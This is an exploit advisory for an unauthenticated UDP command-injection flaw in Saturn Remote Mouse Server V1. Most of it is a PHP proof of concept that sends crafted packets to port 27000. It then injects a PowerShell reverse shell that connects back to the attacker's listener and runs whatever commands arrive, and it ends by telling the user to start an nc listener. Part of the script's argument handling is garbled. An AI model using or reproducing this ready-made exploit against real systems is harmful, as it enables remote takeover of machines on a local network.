============================================================================================================================================= | # Title : Saturn Remote Mouse Server V1 - UDP-based Command Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://www.saturnremote.com/ | ============================================================================================================================================= [+] Summary : A service component of Saturn Remote Mouse Server listens for unauthenticated UDP JSON-like frames on UDP port 27000. Improper input handling allows specially crafted frames to cause execution of arbitrary commands within the context of the service process, resulting in Remote Code Execution (RCE) on the target host accessible from the local network. [+] Impact: Remote, unauthenticated attackers on the same local network can send malformed or specially crafted UDP packets that the server parses and forwards to a command execution sink, enabling arbitrary code execution under the service account. This may result in full system compromise depending on service privileges. [+] Vectors: - UDP packets containing JSON frames (port 27000) with fields which are concatenated or passed directly to OS execution functions or PowerShell without validation or sanitization. - No authentication or origin validation observed for packets arriving from local network. [+] POC : php poc.php --lhost 192.168.1.3 --lport 4444 --lport \n"; exit(1); } $lhost = $options['lhost']; $lport = intval($options['lport']); $UDP_IP = "192.168.1.109"; $UDP_PORT = 27000; $messages = [ "7b224973436f6e6e656374696e67223a2274727565227d", "7b22636f6e6e656374696f6e223a2022616374697665227d", "7b2241726561486569676874223a302c22417265615769647468223a302c22436f6d6d616e644e616d65223a225354415254222c2258223a302c2259223a307d", "7b224b6579223a22636d64227d", "7b224b6579223a225c6e227d", ]; $ps_command = "powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('$lhost',$lport);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""; $hex_ps = bin2hex("{\"Key\": \"$ps_command\"}"); $messages[] = $hex_ps; $messages[] = "7b224b6579223a225c6e227d"; echo "[*] Sending UDP packets to $UDP_IP:$UDP_PORT\n"; echo "[*] Target listener: $lhost:$lport\n\n"; foreach ($messages as $i => $hex_msg) { $data = hex2bin($hex_msg); if ($data === false) { echo "[!] Invalid hex for message " . ($i + 1) . "\n"; continue; } $fp = fsockopen("udp://$UDP_IP", $UDP_PORT, $errno, $errstr); if (!$fp) { echo "[!] Cannot open UDP socket: $errstr ($errno)\n"; break; } fwrite($fp, $data); fclose($fp); echo "[+] Sent packet " . ($i + 1) . " (" . strlen($data) . " bytes)\n"; sleep(1); } echo "\n[+] All packets sent!\n"; echo "[*] Start your listener: nc -nlvp $lport\n"; } main(); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================